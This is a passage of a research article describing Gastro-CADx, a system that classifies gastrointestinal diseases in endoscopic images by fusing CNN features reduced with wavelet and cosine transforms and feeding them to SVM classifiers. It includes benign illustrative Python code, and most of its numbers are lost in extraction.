z-line, pylorus, and cecum. the three pathological states are esophagitis, polyps, and ulcerative colitis. the two classes associated with lesion removal are dyed lifted polyps and dyed resection margins. the one demonstrating the quality of mucosal views is bowel quality. figure shows samples of images included in the dataset. deep convolutional neural networks architectures the popular type of dl approaches that is generally utilized for solving image-related classification problems in the health informatics field is the convolutional neural network (cnn) (jin et al., ). in this article, four cnns are utilized including; alexnet, resnet- , darknet- , and densenet- constructions. as it can be noticed from table that most related studies used alexnet, resnet and vgg cnns. we did not use vgg as it has very high computational cost and number of parameters. also, the features extracted from this network is of very huge size (bi et al., ; ertosun & rubin, ; su et al., ). although, alexnet is one of the oldest architectures, but it is still being used due to its acceptable performance. 
this is because it has efficient computation ability and figure image samples of kasvir dataset: (a) dyed-lifted-polyp, (b) dyed-resection-margin, (c) esophagitis, (d) normal-z-line, (e and f) normal-cecum, polyps, (g) normal-pylorus, and (h) ulcerative-colitis. image credit: michael riegler. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performs well with color images like these used in this article well (wang, xu & han, ). we employed more recent cnns like darknet and densenet architectures. to our own knowledge darknet was not used in the literature, whereas, only few articles used densenet for classifying gi diseases but has several drawbacks in their proposed methods. therefore, we used these two new cnns architectures to test their performance and ability to classify multiple gi diseases from endoscopic images. the size of the input and output layers of the four networks employed used in the proposed method is shown in table . alexnet the structure of alexnet cnn was presented in by krizhevsky, sutskever & hinton ( ). this construction won the imagenet large-scale visual recognition challenge in . the structure of alexnet includes layers corresponding to convolutional layers, rectified linear unit (relu) layers, normalization layers, pooling layers, fc layers, a probabilistic layer using softmax units, and a classification layer ending in , neurons for , categories (attallah, sharkas & gadelkarim, ). darknet- darknet was first introduced in by redmon & farhadi ( ). darknet- is a cnn that is utilized as the spine of yolo-v . it commonly employs × filters and pairs figure image samples of hyperkvasir dataset. (a) bowel quality, (b) normal cecum, (c) dyed-lifted-polyp, (d) dyed-resection-margin, (e) esophagitis, (f) polyps, (g) polyrous, (h) retroflex stomach, (i) ulcerative-colitis, and (j) normal-z-line. full-size doi: . /peerj-cs. /fig- table a summary of the four cnns architectures. cnn structure number of layers size of input size of output alexnet × , resnet- × , darknet- × and densenet- × , attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the number of channels after each pooling stage. darknet- utilizes global average pooling to perform classifications in addition to × filters to reduce the feature demonstration between × convolutions. batch normalization is applied to regularize the classification model batch, make the training process more stable, and accelerate convergence. darknet- consists of convolutional layers and max-pooling layers. resnet- resnet architecture was first introduced in . the essential constructing block of the resnet is the residual block which was suggested by he et al. ( ). the residual block offers shortcuts associations within the convolution layers, which can assist the network to step some convolution layers at a time. in other words, the residual block recommends two choices, it may attain a set of functions on the input, or it can permit this stage. therefore, resnet construction is supposed to be more effective than other cnns such as alexnet and googlenet as stated in attallah, sharkas & gadelkarim ( ). in this study, resnet- is used which consists of convolutional layers and one fc layer. 
densenet- the latest research has revealed that cnns can be significantly deeper, more accurate, and effective to learn when they consist of smaller connections between layers near the input and those adjacent to the output. this finding motivated huang et al. ( ) to propose the dense convolutional network (densenet). densenet joins every layer to each other layer in a feed-forward manner. while conventional cnns with m layers have m connections—one amid every layer and its succeeding layer, densenet has m(m + )/ straight connections. for every layer, the feature-maps of all previous layers are utilized as inputs, and its feature-maps are utilized as inputs into all following layers. densenet has numerous benefits such as their ability to lessen the vanishing-gradient issue, reinforce feature dissemination, boost feature reprocesses, and considerably decrease the number of parameters. in this article, densenet- is used which has layers deep. proposed gastro-cadx an efficient hybrid cadx system called gastro-cadx is proposed to classify several gi classes from endoscopic images. gastro-cadx involves three steps including, the image preprocessing step, followed by feature extraction, reduction and fusion step, and finally a classification step. initially, several augmentation processes are utilized to raise the number of images in the datasets. also, images are resized. in the feature extraction, reduction, and fusion step, three stages are performed to construct gastro-cadx. in the first stage, valuable deep features are extracted from four cnns including (resnet- , alexnet, densenet- , and darknet- ). in the second stage, two handcrafted features are used to extract features from the spatial dl features extracted in the first stage. these handcrafted features are textural analysis based features representing temporal-frequency and spatial-frequency features. the dimension of these extracted features is reduced in this stage. afterward, is the third stage of the gastro-cadx, where several reduced features are fuzed in a concatenated manner. finally, is the classification step in which machine attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learning classifiers are used to identify several gi classes. figure represents the block diagram of gastro-cadx. image preprocessing step the endoscopic images of both datasets are resized according to the size of the input layer of each cnn (attallah, ragab & sharkas, ) shown in table . subsequently, these frames are augmented. the augmentation process is essential to raise the number of images (attallah, sharkas & gadelkarim, ; ragab & attallah, ). this technique is performed because most likely the models which are learned with an insufficient quantity of frames may over-fit (ravì et al., ; attallah, sharkas & gadelkarim, ). the augmentation techniques utilized in this article to produce new endoscopic images from the training data are flipping, translation, transformation, and rotating (talo et al., ; attallah, ragab & sharkas, ). each frame is flipped and translated in x and y directions with pixel range (− , ) (attallah, ragab & sharkas, ). furthermore, each endoscopic image is rotated with an angle range ( – ) degrees (ragab & attallah, ). feature extraction, reduction, and fusion step gastro-cadx is based on three stages. the first stage is the dl feature extraction stage. the second is the handcrafted feature extraction and the reduction stage. 
finally is the third stage known as the fusion stage. deep learning feature extraction stage (first stage of gastro-cadx) pre-trained cnns trained using the endoscopic frames are used to accomplish feature extraction or classification processes. during the feature mining process, valuable dl features are mined from the cnns. instead of utilizing the cnns for classification, dl figure the block diagram of the proposed gastro-cadx. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ variables are pulled out from the fully connected layer called “fc ” as in attallah, ragab & sharkas ( ), the “global average pooling d layer” (fifth pooling layer), and the last average pooling layer of the alexnet, resnet- , darknet, and densenet constructions as in (ragab & attallah, ). the dl features size are , , , , or , and , for alexnet, resnet- , darknet- , and densenet- respectively. handcrafted feature extraction and reduction stage (second stage of gastro-cadx)hand- crafted feature extraction in this stage, time-frequency and spatial-frequency features based on textural analysis are determined from the dl features extracted in the previous stage. the textural features include the coefficients of the discrete wavelet transform (dwt) and the discrete cosine transform (dct). each feature method is discussed below. we employed dwt and dct as they are popular feature extraction method based on textural analysis. one of the main benefit of dct is its capability to spatially alter to characteristics of an image for instance discontinuities and changing frequency manner (bennet, arul ganaprakasam & arputharaj, ). it offers time-frequency representation of an image. also, dct has several advantages, first of all it prevents complicated calculation and presents simplicity of execution in practical purposes. furthermore, dct is capable of effectively managing the phase removing problem and demonstrates a powerful energy compaction estate (imtiaz & fattah, ; rashidi, fallah & towhidkhah, ). dwt and dct are the utmost common approach to extract textural features in the medical image processing area (lahmiri & boukadoum, ; srivastava & purwar, ; mishra et al., ; anthimopoulos et al., ; benhassine, boukaache & boudjehem, ). textural analysis based methods are useful in extracting texture features from images which is equivalent to simulating human visual learning procedure. it is widely used in medical image processing (attallah, ; lahmiri & boukadoum, ; anwar et al., ; castellano et al., ). � discrete wavelet transform (dwt) is a widely used feature extraction method. dwt examines both signals and images (lahmiri & boukadoum, ; srivastava & purwar, ). it offers a temporal-frequency representation of an image or signal through decomposing them with the help of a group of orthogonal basis functions (ortho-normal). images are of two dimensions; therefore -d dwt is used to decompose the image (attallah, sharkas & gadelkarim, ). one dimensional dwt is employed on each dl feature set distinctly which results in four groups of coefficients (ragab & attallah, ). the four groups generated after the -d dwt are known as three detail coefficients, cd , and approximation coefficients, ca . detail coefficients consist of the diagonal, vertical, and horizontal coefficients, correspondingly. 
� discrete cosine transform (dct) is frequently used to transform images into basic frequency components. it displays data as a sum of cosine functions oscillating at different frequencies (aydoğdu & ekinci, ). generally, the dct is applied to the imaged features to attain the dct coefficients. the dct coefficients are separated into three sets, known as low frequencies called (dc coefficients), middle frequencies, and high frequencies called (ac coefficients). high frequencies characterize noise and attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ small deviations (details). whereas, low frequencies are associated with the brightness conditions. on the other hand, middle frequencies coefficients comprise valuable information and build the basic assembly of the image. the dimension of the dct coefficient matrix is identical to the input dl featue (dabbaghchian, ghaemmaghami & aghagolzadeh, ).feature reduction feature reduction is an important procedure that is commonly used in the medical field to lower the huge dimension of the feature space. this reduction will correspondingly lead to a reduction in the complexity of the classification procedure (ragab & attallah, ), the training time of the model, and avoid overfitting (attallah et al., a; b). for this reason, dwt and dct have been employed as feature reduction procedures as well as feature extractors instead of directly using the large dimension of dl features generated in the previous step. therefore, a -level of dwt is applied to each dl features. the coefficients generated are are the approximation coefficients ca , and detail coefficients cd of the first decomposition level of dwt. these coefficients have half the dimension of the original dl feature dimension which enters the dwt process. by this way the dimension of feature space is reduced. the ca and cd coefficients are used separately to train the svm classifiers of the next step of gastro-cadx. the dct, on its own, does not reduce the data dimension; however, it shrinks most of the image information in a small number of coefficients (dabbaghchian, ghaemmaghami & aghagolzadeh, ). another reduction stage is usually executed to reduce the data dimension, where some of the coefficients are chosen to develop feature vectors. in this article, dct coefficients are generated using the zigzag procedure. after this reduction procedure, these coefficients are used separately to train the svm classifiers of the next step of gastro-cadx. feature fusion (third stage of gastro-cadx) the feature vectors generated for each of the dct and dwt coefficients are then fuzed in a concatenated manner to form different combinations of fuzed features sets which are then used to classify the svm classifiers in the next step of gastro-cadx. for dwt, initially, the ca coefficients extracted from the dl features for every two networks are fuzed. then, the ca coefficients extracted from the dl features of every three networks are fuzed. next, all ca coefficients extracted from dl features of the four networks are merged. the same procedure is done for the cd coefficients. for the dct, firstly the coefficients extracted from the dl features for every two networks are fuzed. then, the coefficients extracted from the dl features of every three networks are fuzed. 
classification step
in this step, the classification procedure is performed using two scenarios: either by end-to-end dl techniques (attallah, ragab & sharkas, ), or by using the features extracted from the three stages of gastro-cadx. these scenarios correspond to four experiments. the first scenario represents the use of the four cnns, including alexnet, resnet- , darknet- , and densenet- , as classifiers (end-to-end dl process). each pre-trained cnn is created and trained distinctly and then used as a classifier. the first scenario represents experiment i. in the second scenario, the first stage of gastro-cadx is executed, which corresponds to experiment ii, where the pre-trained cnns are applied to the images and the dl features are then extracted from each network individually. these dl features are used to train distinct svm classifiers. these features represent spatial information only and are of huge dimension. therefore, in the second stage of gastro-cadx, which corresponds to experiment iii, the dwt and dct feature extraction methods are applied to the dl features generated by each cnn of the first stage of gastro-cadx to extract temporal-frequency and spatial-frequency information. these features are utilized to train svm classifiers individually. the problem of dimensionality reduction is considered as well in the second stage of gastro-cadx, where a reduced set of coefficients is generated using the dwt and dct methods. these coefficients represent feature vectors that are used separately to train three svm classifiers. finally, in the third stage of gastro-cadx, the reduced features are fused to form different combinations of fused features. these different combinations are used to construct several distinct svm classifiers. the aim of this stage is to examine the influence of feature fusion on the classification accuracy and to select the combination which has the highest impact on the performance of gastro-cadx. this stage corresponds to experiment iv.

figure: a summary of the four experiments of gastro-cadx.

note that the svm classifier was chosen as it is known to be a powerful classifier. it is considered one of the best methods in pattern classification and image classification (thai, hai & thuy, ). it performs well with large-dimensional feature spaces and multi-class problems, as it uses a kernel function which maps the feature space into a new domain in which the classes of a dataset can be separated more easily. therefore, it is commonly used with the huge dimension of dl features extracted from cnns (ragab et al., ; jadoon et al., ; zhang et al., ; das et al., ; xue et al., ; leng et al., ; wu et al., ; sampaio et al., ), achieving outperforming results. also, as table shows, svm is commonly used in the literature, and it can be observed that the articles that used svm achieved the highest performance, such as khan et al. ( b) which achieved an accuracy of . %, khan et al. ( a) achieving an accuracy of . %, ghatwary, ye & zolgharni ( ) obtaining an accuracy of %, and billah, waheed & rahman ( ) achieving an accuracy of . %.
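to make the experimental scenarios more tangible, the sketch below outlines experiments ii–iv in python: dl features are taken from the penultimate layer of a pre-trained cnn, optionally reduced and fused, and then classified with an svm. it is an illustrative approximation and not the authors' code: the torchvision alexnet backbone, the 224 × 224 input size, and the helper names are assumptions introduced here.

```python
# illustrative sketch of experiments ii-iv (the article's pipeline was built in
# matlab): extract penultimate-layer dl features from a pre-trained cnn, reduce
# them as shown earlier, fuse selected sets, and train an svm classifier.
import numpy as np
import torch
import torchvision.models as models
from torchvision import transforms
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score

# assumed pre-trained backbone; the authors fine-tuned alexnet, resnet, darknet
# and densenet, so this specific model/layer choice is only an example.
backbone = models.alexnet(weights=models.AlexNet_Weights.DEFAULT)
feature_extractor = torch.nn.Sequential(
    backbone.features, backbone.avgpool, torch.nn.Flatten(),
    *list(backbone.classifier.children())[:-1])   # drop the final fc layer
feature_extractor.eval()

preprocess = transforms.Compose([
    transforms.Resize((224, 224)), transforms.ToTensor(),
    transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])

def extract_dl_features(images):
    """images: list of PIL images -> (n, 4096) numpy array of dl features."""
    batch = torch.stack([preprocess(im) for im in images])
    with torch.no_grad():
        return feature_extractor(batch).numpy()

def train_svm_on_features(features, labels, kernel="linear"):
    """experiment ii/iii/iv classifier: an svm trained on (possibly reduced or
    fused) feature vectors, scored with 5-fold cross-validation."""
    clf = SVC(kernel=kernel)          # "poly" with degree 2/3 ~ quadratic/cubic svm
    return cross_val_score(clf, features, labels, cv=5).mean()

def fuse(*feature_sets):
    """experiment iv fusion: concatenate reduced sets from several cnns."""
    return np.concatenate(feature_sets, axis=1)
```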
experimental setup
several parameters are tuned after fine-tuning the fc layer of the cnns. the number of epochs and the initial learning rate for the four cnns are and − respectively, as in (attallah, sharkas & gadelkarim, ). the mini-batch size and validation frequency are and . the weight decay and momentum are set to × − and . respectively. the optimization algorithm used is stochastic gradient descent with momentum (sgdm). to measure the capacity of gastro-cadx to classify several gi diseases, five-fold cross-validation is employed. this means that the gi datasets are divided into 80–20% for training and validation. the svm classifiers are trained with four folds and verified on the remaining fold. thus, the models are trained five times and the testing accuracy is calculated each time and then averaged. the kernel functions used for the svm classifier are linear, quadratic, and cubic.

evaluation performance
the presented gastro-cadx framework is evaluated with numerous measures, for instance f1-score, precision, accuracy, sensitivity, and specificity. the formulas utilized in calculating such metrics are displayed below in eqs. (1)–(5) (attallah, ragab & sharkas, ).

\[ \text{accuracy} = \frac{TP + TN}{TN + FP + FN + TP} \tag{1} \]

\[ \text{sensitivity} = \frac{TP}{TP + FN} \tag{2} \]

\[ \text{specificity} = \frac{TN}{TN + FP} \tag{3} \]

\[ \text{precision} = \frac{TP}{TP + FP} \tag{4} \]

\[ \text{f1-score} = \frac{2 \times TP}{(2 \times TP) + FP + FN} \tag{5} \]

where tp is the total number of gi images that are correctly classified to the gi class to which they actually belong; tn is the number of gi images that do not belong to the gi class intended to be classified and truly do not belong to it; for each gi class, fp is the number of images that are classified as this gi class but do not truly belong to it; and, for each gi class, fn is the total number of gi images of this class that are not classified as it.
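the following short python sketch mirrors eqs. (1)–(5) by computing the per-class metrics from a one-vs-rest view of the confusion matrix; the class names in the example are hypothetical, and the snippet is not the authors' matlab evaluation code.

```python
# illustrative computation of eqs. (1)-(5) per class (one-vs-rest) from a
# confusion matrix; class names below are hypothetical examples.
import numpy as np
from sklearn.metrics import confusion_matrix

def per_class_metrics(y_true, y_pred, labels):
    cm = confusion_matrix(y_true, y_pred, labels=labels)
    metrics = {}
    for i, cls in enumerate(labels):
        tp = cm[i, i]
        fn = cm[i, :].sum() - tp
        fp = cm[:, i].sum() - tp
        tn = cm.sum() - tp - fn - fp
        metrics[cls] = {
            "accuracy":    (tp + tn) / (tp + tn + fp + fn),
            "sensitivity": tp / (tp + fn),
            "specificity": tn / (tn + fp),
            "precision":   tp / (tp + fp),
            "f1":          2 * tp / (2 * tp + fp + fn),
        }
    return metrics

if __name__ == "__main__":
    y_true = ["polyp", "ulcer", "polyp", "normal", "ulcer", "normal"]
    y_pred = ["polyp", "ulcer", "ulcer", "normal", "ulcer", "normal"]
    print(per_class_metrics(y_true, y_pred, ["polyp", "ulcer", "normal"]))
```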
results
the results of the four experiments of gastro-cadx are presented in this section. experiment i is an end-to-end dl process where the four cnns are employed to perform classification. in experiment ii (first stage of gastro-cadx), dl features are extracted from the four cnns and used to train distinct svm classifiers. experiment iii (second stage of gastro-cadx) represents the use of the second stage of feature extraction and reduction methods, which employs dct and dwt to extract temporal-frequency and spatial-frequency information from the images. in this experiment, the reduced coefficients generated from the dwt and dct methods are employed to train svm classifiers. in experiment iv, different combinations of fused features are generated and utilized to inspect the effect of feature combination on gastro-cadx performance.

experiment i results
the results of the end-to-end dl procedure employed for classification are illustrated in tables and for dataset i and dataset ii respectively. table shows that the highest accuracy of . % is achieved by resnet- , followed by accuracies of . %, . %, and . % attained by darknet- , densenet- , and alexnet respectively for dataset i. table demonstrates that the peak accuracy of . % is achieved by resnet- , followed by accuracies of . %, . %, and . % attained by darknet- , densenet- , and alexnet respectively for dataset ii.

table: the classification accuracy for the four cnns used in gastro-cadx using dataset i.
cnn | accuracy (%)
alexnet | .
resnet- | .
darknet- | .
densenet- | .

table: the classification accuracy for the four cnns used in gastro-cadx using dataset ii.
cnn | accuracy (%)
alexnet | .
resnet- | .
darknet- | .
densenet- | .

experiment ii results
this experiment represents the first stage of gastro-cadx. the results of this experiment are shown in figs. and for dataset i and dataset ii respectively. figure indicates that the maximum accuracies of . % and . % are attained by darknet- using linear and quadratic svm classifiers with dataset i. subsequently, resnet- features achieve accuracies of . %, . %, and . % using linear, quadratic, and cubic svm classifiers respectively. following, alexnet and densenet- features obtain accuracies of . %, %, . % and %, . %, . % using linear, quadratic, and cubic svm classifiers respectively. figure shows that peak accuracies of . %, . %, and . % are achieved by resnet- using linear, quadratic, and cubic svm classifiers constructed with dataset ii. next, darknet features attain accuracies of . %, %, and . % using linear, quadratic, and cubic svm classifiers respectively. following, alexnet and densenet- features obtain accuracies of . %, . %, . % and . %, . %, . % using linear, quadratic, and cubic svm classifiers respectively.

figure: experiment ii—accuracy of each dl feature set extracted from the four cnns of gastro-cadx constructed using dataset i.
figure: experiment ii—accuracy of each dl feature set extracted from the four cnns of gastro-cadx constructed using dataset ii.

experiment iii results
this experiment represents the second stage of gastro-cadx. the results of this experiment are shown in figs. – for dataset i and figs. – for dataset ii. figure shows the classification accuracy for the three svm classifiers constructed with the ca and cd coefficients of dwt, besides the dct coefficients extracted from the resnet- cnn using dataset i. the figure indicates that the peak accuracy of . % is achieved using the dct coefficients with linear svm. almost the same accuracy of . % is attained using the ca coefficients of dwt. figure demonstrates the classification accuracy for the three svm classifiers built with the ca and cd coefficients of dwt, in addition to the dct coefficients extracted from the alexnet cnn using dataset i. the figure specifies that the highest accuracy of . % is accomplished using the cd coefficients of dwt with a quadratic svm classifier. a slightly lower accuracy of . % is attained using the ca coefficients of dwt. figure displays the classification accuracy for the three svm classifiers constructed with the ca and cd coefficients of dwt, as well as the , dct coefficients extracted from the densenet cnn using dataset i. the figure identifies that the highest accuracy of . % is accomplished using the ca coefficients of dwt with a cubic svm classifier. a lower accuracy of . % is reached using the ca coefficients of dwt with a linear svm classifier.

figure: experiment iii—accuracy of each dct and dwt feature set extracted from the resnet- cnn of gastro-cadx constructed using dataset i.
figure shows the classification accuracy for the three svm classifiers created with the ca and cd coefficients of dwt, besides the dct coefficients extracted from the darknet- cnn using dataset i. note that, since the number of dl features extracted from darknet- was only (which is already a small dimension of features), all the dct coefficients are used in this experiment without the need for the zigzag scanning procedure. the figure indicates that the highest accuracy of . % is accomplished using the dct coefficients with linear svm.

figure: experiment iii—accuracy of each dct and dwt feature set extracted from the alexnet cnn of gastro-cadx constructed using dataset i.
figure: experiment iii—accuracy of each dct and dwt feature set extracted from the densenet- cnn of gastro-cadx constructed using dataset i.

figure shows the classification accuracy for the three svm classifiers constructed with the ca and cd coefficients of dwt, besides the dct coefficients extracted from the resnet- cnn using dataset ii. the figure indicates that the peak accuracy of . % is achieved using the ca coefficients with linear, cubic, and quadratic svm. almost the same accuracy of . % is attained using the cd coefficients of dwt with linear, cubic, and quadratic svm and the dct coefficients with linear svm.

figure: experiment iii—accuracy of each dct and dwt feature set extracted from the darknet cnn of gastro-cadx constructed using dataset i.
figure: experiment iii—accuracy of each dct and dwt feature set extracted from the resnet- cnn of gastro-cadx constructed using dataset ii.

figure reveals the classification accuracy for the three svm classifiers trained with the ca and cd coefficients of dwt, besides the dct coefficients extracted from the alexnet cnn using dataset ii. the figure specifies that the highest accuracy of . % is accomplished using the ca coefficients of dwt with a quadratic svm classifier. a slightly lower accuracy of . % is attained using the cd coefficients of dwt with quadratic svm.

figure: experiment iii—accuracy of each dct and dwt feature set extracted from the alexnet cnn of gastro-cadx constructed using dataset ii.
figure: experiment iii—accuracy of each dct and dwt feature set extracted from the densenet- cnn of gastro-cadx constructed using dataset ii.

figure indicates the classification accuracy for the three svm classifiers built with the ca and cd coefficients of dwt, besides the , dct coefficients extracted from the densenet cnn using dataset ii. the figure identifies that the highest accuracy of . % is accomplished using the ca coefficients of dwt with cubic and quadratic svm classifiers.
the same accuracy is reached using the cd coefficients of dwt with a quadratic svm classifier. figure demonstrates the classification accuracy for the three svm classifiers constructed with the ca and cd coefficients of dwt, in addition to the dct coefficients extracted from the darknet- cnn using dataset ii. as the number of dl features mined from darknet- was only in the case of dataset ii (which is already a small dimension of features), all the dct coefficients are employed in this experiment without the necessity of the zigzag scanning process. the figure specifies that the peak accuracy of . % is obtained using the dct coefficients with linear svm.

figure: experiment iii—accuracy of each dct and dwt feature set extracted from the darknet- cnn of gastro-cadx constructed using dataset ii.

experiment iv results
this experiment represents the third stage of gastro-cadx. it aims to explore the effect of combining features on the cadx's performance and, moreover, to search for the best combination of fused feature sets which has the highest influence on the classification accuracy. to form the fused feature sets, firstly for dwt, the cd coefficients extracted from the dl features of every two cnns are fused. next, the cd coefficients extracted from the dl features of every three cnns are merged. afterward, all cd coefficients extracted from the dl features of the four cnns are combined. a similar fusion process is executed for the ca coefficients. for dct, initially, the coefficients extracted from the dl features of every two cnns are fused. afterward, the dct coefficients extracted from the dl features of every three cnns are fused. next, the coefficients extracted from the dl features of the four cnns are merged.
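a compact way to express this fusion search is sketched below, assuming python with scikit-learn; the dictionary of per-cnn reduced coefficients and the helper name best_fusion are hypothetical, and the kernel/degree settings only stand in for the linear, quadratic, and cubic svm classifiers mentioned above.

```python
# illustrative sketch of the experiment-iv fusion search (hypothetical names,
# not the authors' code): every pair, triple, and the full set of the four
# cnns' reduced coefficient vectors are concatenated and scored with an svm.
from itertools import combinations
import numpy as np
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score

def best_fusion(reduced_feats, labels, kernel="poly", degree=3):
    """reduced_feats: dict like {"alexnet": (n, d1), "resnet": (n, d2), ...}
    holding ca, cd, or dct coefficients per cnn. returns the best combination."""
    results = {}
    names = list(reduced_feats)
    for r in (2, 3, 4):
        for combo in combinations(names, r):
            fused = np.concatenate([reduced_feats[n] for n in combo], axis=1)
            clf = SVC(kernel=kernel, degree=degree)   # cubic svm when degree=3
            results[combo] = cross_val_score(clf, fused, labels, cv=5).mean()
    return max(results.items(), key=lambda kv: kv[1])
```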
table displays a comparison between the classification accuracy achieved using ca and cd features extracted from different combinations of the dl features generated from the four cnns employed in gastro-cadx using dataset i. this comparison shows that the ca features have slightly higher accuracy than the cd features for all combinations of fused features except for alexnet+resnet and alexnet+densenet. the maximum performance (written in bold) is achieved using ca and cd features extracted using the fusion of alexnet+resnet+densenet cnns, where the highest accuracy of . % is attained using ca features extracted using alexnet+resnet+densenet cnns with both quadratic and cubic svm. on the other hand, table presents a comparison between the classification accuracy accomplished using dct features extracted from different combinations of the dl variables produced from the four cnns employed in gastro-cadx using dataset i.

table: the classification accuracy (%) for the ca and cd features of dwt extracted from different combinations of cnns used in gastro-cadx using dataset i.
features | ca: linear / quadratic / cubic | cd: linear / quadratic / cubic
resnet+darknet | . / . / . | . / . / .
alexnet+darknet | . / . / . | . / . / .
densenet+darknet | . / . / . | . / . / .
alexnet+resnet | . / . / . | . / . / .
alexnet+densenet | . / . / . | . / . / .
resnet+densenet | . / . / . | . / . / .
alexnet+resnet+densenet | . / . / . | . / . / .
alexnet+resnet+darknet | . / . / . | . / . / .
alexnet+densenet+darknet | . / . / . | . / . / .
resnet+densenet+darknet | . / . / . | . / . / .
alexnet+resnet+densenet+darknet | . / . / . | . / . / .

table: the classification accuracy (%) for the dct features extracted from different combinations of cnns used in gastro-cadx using dataset i.
features | linear / quadratic / cubic
resnet+darknet | . / . / .
alexnet+darknet | . / . / .
densenet+darknet | . / . / .
alexnet+resnet | . / . / .
alexnet+densenet | . / . / .
resnet+densenet | . / . / .
alexnet+resnet+darknet | . / . / .
alexnet+densenet+darknet | . / . / .
resnet+densenet+darknet | . / . / .
alexnet+resnet+densenet | . / . / .
alexnet+resnet+densenet+darknet | . / . / .

this comparison indicates that the maximum performance (written in bold) is achieved using dct features extracted using alexnet+resnet+densenet+darknet cnns, where the highest accuracy of . % is attained using features extracted using alexnet+resnet+densenet+darknet cnns with both quadratic and cubic svm. table demonstrates a comparison between the classification accuracy accomplished using ca and cd features extracted from different combinations of the dl variables produced from the four cnns using dataset ii. this comparison indicates that the ca features have slightly higher accuracy than the cd features for all combinations of fused features except for alexnet+resnet and alexnet+densenet. the peak performance (written in bold) is achieved using ca and cd features extracted using alexnet+resnet+densenet cnns, where the maximum accuracy of . % is reached using ca features extracted using alexnet+resnet+densenet cnns with cubic svm. in contrast, table shows a comparison between the classification accuracy accomplished using dct features extracted from different combinations of the dl variables generated from the four cnns employed in gastro-cadx using dataset ii. this comparison specifies that the maximum accuracy (written in bold) is achieved using dct features extracted using alexnet+resnet+densenet cnns and alexnet+resnet+densenet+darknet cnns, where the highest accuracy of . % is attained using linear, quadratic, and cubic svm classifiers. table shows the performance metrics for the cubic svm classifiers trained with the fused ca features extracted from alexnet+resnet+densenet cnns using dataset i and dataset ii. the results of table indicate that a specificity of . and . , a sensitivity of . and . , a precision of . and . , and an f1 score of . and . are obtained for dataset i and dataset ii respectively.

table: the classification accuracy (%) for the ca and cd features of dwt extracted from different combinations of cnns used in gastro-cadx using dataset ii.
features | ca: linear / quadratic / cubic | cd: linear / quadratic / cubic
resnet+darknet | . / . / . | . / . / .
alexnet+darknet | . / . / . | . / . / .
densenet+darknet | . / . / . | . / . / .
alexnet+resnet | . / . / . | . / . / .
alexnet+densenet | . / . / . | . / . / .
resnet+densenet | . / . / . | . / . / .
alexnet+resnet+densenet | . / . / . | . / . / .
alexnet+resnet+darknet | . / . / . | . / . / .
alexnet+densenet+darknet | . / . / . | . / . / .
resnet+densenet+darknet | . / . / . | . / . / .
alexnet+resnet+densenet+darknet | . / . / . | . / . / .

discussion
the manual diagnosis of gi diseases with a huge number of endoscopic images is very challenging and time-consuming. besides, at times the image containing the abnormality can simply be overlooked by the medical expert, which can lead to misdiagnosis. therefore, there is an essential need for automatic systems that have the capability to automatically identify possible anomalies by analyzing the entire set of endoscopic images (aoki et al., ).
nowadays, with the current development of dl and image processing technologies, cadx systems have been frequently used to help gastroenterologists automatically examine endoscopic images and recognize gi diseases (khan et al., b). in this study, an automatic cadx system called gastro-cadx is proposed. the proposed cadx involves three steps: the image preprocessing step, followed by the feature extraction, reduction, and fusion step, and finally the classification step. first, the endoscopic images were augmented. next comes the feature extraction, reduction, and fusion step, which presents the three stages of gastro-cadx. in the first stage of gastro-cadx, valuable spatial dl features were extracted from the four cnns and used to train svm classifiers. next, in the second stage of gastro-cadx, the dct and dwt feature extraction methods were employed to extract temporal-frequency and spatial-frequency features. these methods were used for feature reduction as well. these extracted features are utilized to construct the svm classifiers. finally, in the third stage of gastro-cadx, the coefficients of the dct and dwt were fused to form different combinations of fused feature sets. this stage examined the influence of fusing features on the performance of the cadx. besides, the third stage of gastro-cadx searched for the best mixture of features that influenced gastro-cadx's performance.

table: the classification accuracy (%) for the dct features extracted from different combinations of cnns used in gastro-cadx using dataset ii.
features | linear / quadratic / cubic
resnet+darknet | . / . / .
alexnet+darknet | . / . / .
densenet+darknet | . / . / .
alexnet+resnet | . / . / .
alexnet+densenet | . / . / .
resnet+densenet | . / . / .
alexnet+resnet+darknet | . / . / .
alexnet+densenet+darknet | . / . / .
resnet+densenet+darknet | . / . / .
alexnet+resnet+densenet | . / . / .
alexnet+resnet+densenet+darknet | . / . / .

table: the performance metrics for the ca features of dwt extracted from alexnet+resnet+densenet cnns using dataset i and ii.
| specificity | sensitivity | precision | f1 score
dataset i, cubic svm | . | . | . | .
dataset ii, cubic svm | . | . | . | .

two datasets, namely dataset i and dataset ii, were used to evaluate the performance of the proposed gastro-cadx. the first stage of gastro-cadx is compared with the end-to-end dl cnns of experiment i, and the results are shown in table for dataset i and ii. it can be observed from table that the first stage of gastro-cadx has higher accuracies compared to the end-to-end cnns constructed in experiment i for both datasets. the highest accuracy achieved in the first stage of gastro-cadx is . % using linear svm trained with darknet- features for dataset i (written in bold), whereas for dataset ii the peak accuracy attained in the first stage of gastro-cadx is . % using linear svm trained with darknet- features. it was found that most of the previous studies directly used spatial dl features to perform the classification; however, in this article we tried extracting spatial-temporal-frequency dl features using dwt and spatial-frequency dl features using dct to examine their influence on the classification performance of gastro-cadx (stage two of gastro-cadx). dwt and dct were also used to reduce the huge dimension of the dl spatial features. it is proved from fig.
